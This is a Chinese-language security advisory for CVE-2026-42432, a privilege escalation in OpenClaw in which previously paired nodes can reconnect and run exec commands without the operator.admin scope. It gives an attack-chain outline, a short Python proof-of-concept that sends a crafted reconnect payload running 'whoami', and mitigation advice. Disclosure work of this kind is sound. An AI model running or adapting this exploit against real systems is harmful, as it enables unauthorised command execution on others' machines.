CVE-2026-42432 CVSS 7.8 高危

CVE-2026-42432 OpenClaw权限提升漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42432

漏洞类型

权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.8之前版本存在权限提升漏洞。该漏洞允许已配对的节点在无需operator.admin作用域的情况下重新连接并执行exec命令。攻击者可绕过重新配对的身份验证，在本地助手系统上执行特权命令。

技术细节

该漏洞源于OpenClaw在处理节点重新连接时的逻辑缺陷。在正常流程中，节点重新配对应进行严格的权限验证，特别是验证其是否拥有operator.admin作用域才能执行特权命令。然而，在受影响版本中，系统仅验证了节点是否为“已配对”状态，而未在重新连接阶段强制执行权限作用域检查。攻击者利用这一点，只需维持一个已配对节点的身份，即可在重新连接时发送包含exec能力的指令。由于缺乏对operator.admin的二次验证，系统错误地授权了这些高权限操作，从而实现了从普通节点权限到系统控制权的提升。这使得攻击者能够绕过重新配对的身份验证机制，直接在本地助手系统上执行任意指令，完全破坏了系统的访问控制模型。

攻击链分析

STEP 1

初始配对

攻击者首先需要获得一个已配对节点的身份标识，或者利用系统中现有的已配对节点。

STEP 2

发起重连

攻击者利用该节点身份发起重新连接请求，并在请求中包含exec（执行）能力标记。

STEP 3

绕过验证

由于漏洞存在，系统未验证该节点是否具备operator.admin作用域即允许重连。

STEP 4

执行命令

攻击者通过重连的会话发送特权命令，系统响应并执行，导致权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import json

# Target OpenClaw instance configuration
target_host = "127.0.0.1"
target_port = 8080

# Malicious payload attempting to execute commands without admin scope
# This simulates a previously paired node reconnecting with exec capabilities
payload = {
    "action": "reconnect",
    "node_id": "trusted_node_01",  # Previously paired ID
    "capabilities": ["exec"],      # Requesting exec capability
    "command": "whoami"            # Command to execute
}

def exploit():
    try:
        # Connect to the target OpenClaw service
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_host, target_port))
        
        # Send the malicious reconnection request
        # Vulnerable systems will accept this without checking operator.admin scope
        s.send(json.dumps(payload).encode())
        
        # Receive response
        response = s.recv(1024)
        print("[+] Exploit sent. Response from server:")
        print(response.decode())
        
        s.close()
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    exploit()

影响范围

OpenClaw < 2026.4.8

防御指南

临时缓解措施

如果无法立即升级，建议暂时撤销所有不可信或非必要的已配对节点，并密切监控系统日志，查找异常的重连行为或未授权的命令执行记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表